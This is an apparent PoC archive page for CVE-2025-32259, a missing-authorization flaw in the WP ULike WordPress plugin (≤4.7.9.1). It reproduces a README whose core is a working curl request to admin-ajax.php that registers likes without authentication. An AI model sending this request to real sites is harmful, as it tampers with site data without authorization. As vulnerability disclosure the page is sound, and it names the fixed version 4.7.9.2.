Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32259 PoC — WordPress WP ULike plugin <= 4.7.9.1 - Content Spoofing Vulnerability

Source
Associated Vulnerability
Title:WordPress WP ULike plugin <= 4.7.9.1 - Content Spoofing Vulnerability (CVE-2025-32259)
Description:Missing Authorization vulnerability in Alimir WP ULike wp-ulike.This issue affects WP ULike: from n/a through <= 4.7.9.1.
Description
In affected versions of the WP ULike plugin, there is no proper authorization check before allowing certain AJAX actions or vote manipulations. This allows unauthenticated users to interact with the plugin in ways only logged-in users should be able to — potentially skewing votes or injecting misleading data.
Readme
# WP ULike ≤ 4.7.9.1 - Unauthenticated Content Spoof (CVE-2025-32259)

> 🔬 A simple PoC demonstrating CVE-2025-32259 in the WP ULike plugin for WordPress.  
> 🚨 Educational use only – do not test on systems without explicit authorization.

---

## 🧠 Overview

WP ULike is a popular WordPress plugin that allows users to like content on a site. Versions up to 4.7.9.1 suffer from a **missing authorization vulnerability**, allowing unauthenticated users to spoof "like" actions via AJAX requests.

- **CVE:** [CVE-2025-32259](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32259)
- **Vulnerable Versions:** ≤ 4.7.9.1
- **Fixed Version:** 4.7.9.2

---

## 🚀 Proof of Concept

The vulnerability allows unauthenticated users to interact with the AJAX endpoint and like any content (post, comment, etc.) without permission.

### 🔧 PoC Script

```bash
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Replace id=1 with a valid post ID.

A successful response might look like:
{"status":"success","msg":"You liked this."}
File Snapshot

[4.0K] /data/pocs/852a038d9abfd7768ff0f76072dd31a313389f63 ├── [1.2K] README.md └── [ 230] unauthenticated-like-injection.sh 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →